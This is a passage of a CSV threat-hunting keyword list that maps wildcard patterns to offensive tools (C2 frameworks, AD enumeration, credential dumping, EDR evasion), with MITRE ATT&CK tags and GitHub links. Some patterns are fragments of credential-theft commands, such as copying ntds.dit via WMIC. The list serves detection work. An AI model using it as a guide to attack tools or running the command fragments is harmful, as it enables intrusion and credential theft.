Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. your Internet protocol address and your port number.","T1059 T1505","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/A3h1nt/gimmeSH","1","1","N/A","N/A","2","168","27","2021-08-27T03:12:15Z","2021-08-02T07:22:15Z" +"*a6730ebb3e91961283f7a1cd95ace2a6d0d55e50531a64e57b03e61a8cf2d0e7*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*a7469955bff5e489d2270d9b389064e1*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*a78983b009b688a82458abac952516db57dc7eb3118a35cc737dde29c7b87ec4*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*A7AD39B5-9BA1-48A9-B928-CA25FDD8F31F*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","0","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" +"*A8FE1F5C-6B2A-4417-907F-4F6EDE9C15A3*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*aa3939fc357723135870d5036b12a67097b03309*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.exe*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*AAABAAMAEBAAAAEAIABoBAAANgAAACAgAAABACAAKBEAAJ4EAAAwMAAAAQAgAGgmAADGFQAAKAAAABAAAAAgAAAAAQAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP39*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" +"*AAB4D641-C310-4572-A9C2-6D12593AB28E*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" +"*aakchaleigkohafkfjfjbblobjifikek*","greyware_tool_keyword","ProxFlow","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*AAP-AddToHighPrivilegePrincipalMap*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*AAP-CheckIfMemberOfPrivilegedDirectoryRole*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*AAP-DisplayApplicableMFAConditionalAccessPolicyForUserID*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*AAP-DisplayHighPrivilegePrincipalMap*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*AAP-DisplayNonHighPrivilegedRoleAssignments*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*AAP-GetHighPrivilegedDirectoryRoleTemplateMap*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*abopscript.txt*","offensive_tool_keyword","EQGR","Equation Group scripts and tools","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Exploitation tools","https://fdik.org/EQGRP/Linux/doc/old/etc/abopscript.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*aboul3la*","offensive_tool_keyword","Github Username","Github username of pentester known for enumeration tools","N/A","N/A","N/A","N/A","Information Gathering","https://github.com/aboul3la","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*AbuseGithubAPI*.cpp*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" +"*AbuseGithubAPI*.exe*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" +"*ac i ntds*\\127.0.0.1\ADMIN$\*","greyware_tool_keyword","wmic","The actor has executed WMIC commands [T1047] to create a copy of the ntds.dit file and SYSTEM registry hive using ntdsutil.exe","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","Volt Typhoon","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ACBypassTest*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-FodHelperBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Accenture/Spartacus*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*AccessTokenImpersonationAccount*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Accounts with extra permissions.txt*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*AceLdr.*.bin*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","714","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" +"*AceLdr.zip*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","714","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" +"*acf7a8a9-3aaf-46c2-8aa8-2d12d7681baf*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" +"*acheron-master.zip*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" +"*ACLight.ps1*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*ACLight.psd1*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*ACLight.psm1*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*ACLight2.ps1*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*ACLight2.psd1*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*ACLight2.psm1*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*ACLight-master*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*aclpwn -f * -ft computer -t * -tt domain -d * -dry*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*aclpwn.py*","offensive_tool_keyword","Aclpwn","Aclpwn.py is a tool that interacts with BloodHound to identify and exploit ACL based privilege escalation paths. It takes a starting and ending point and will use Neo4j pathfinding algorithms to find the most efficient ACL based privilege escalation path. Aclpwn.py is similar to the PowerShell based Invoke-Aclpwn","T1098 - T1208 - T1550 - T1484 - T1486","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/fox-it/aclpwn.py","1","0","N/A","N/A","7","647","104","2021-11-18T03:47:24Z","2018-12-04T18:45:04Z" +"*ACLScanner.exe*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*acltoolkit *","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" +"*acltoolkit.git*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" +"*acltoolkit-ad*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" +"*acltoolkit-main*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" +"*acronis_trueimage_xpc_privesc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*AcroRd32.exe FUZZ*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" +"*Action: Locating SCCM Management Servers*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","0","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" +"*Action: Locating SCCM Servers in Registry*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","0","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" +"*action=SchTaskCOMHijack *","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"*activedirectory/pwns.go*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" +"*activeScan++.py*","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/albinowax/ActiveScanPlusPlus","1","1","N/A","7","6","568","191","2022-11-15T13:47:31Z","2014-06-23T10:04:13Z" +"*AD Privesc Automation*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"*ad_dns_dump.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*AD_Enumeration_Hunt.ps1*","offensive_tool_keyword","AD_Enumeration_Hunt","This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment","T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083","TA0001 - TA0007 - TA0005 - TA0002 - TA0003","N/A","N/A","AD Enumeration","https://github.com/alperenugurlu/AD_Enumeration_Hunt","1","1","N/A","7","1","79","16","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z" +"*AD_Enumeration_Hunt-alperen_ugurlu_hack*","offensive_tool_keyword","AD_Enumeration_Hunt","This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment","T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083","TA0001 - TA0007 - TA0005 - TA0002 - TA0003","N/A","N/A","AD Enumeration","https://github.com/alperenugurlu/AD_Enumeration_Hunt","1","1","N/A","7","1","79","16","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z" +"*ADACLScan.ps1*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","1","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*ADACLScanner*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*ADACLScanner-master*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","1","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*adalanche analyze*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","0","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" +"*adalanche collect*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","0","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" +"*adalanche-*.exe*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" +"*Adalanche.git*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" +"*adalanche-collector*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" +"*ADCollector.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*adconnectdump.py*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" +"*adconnectdump-master*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - 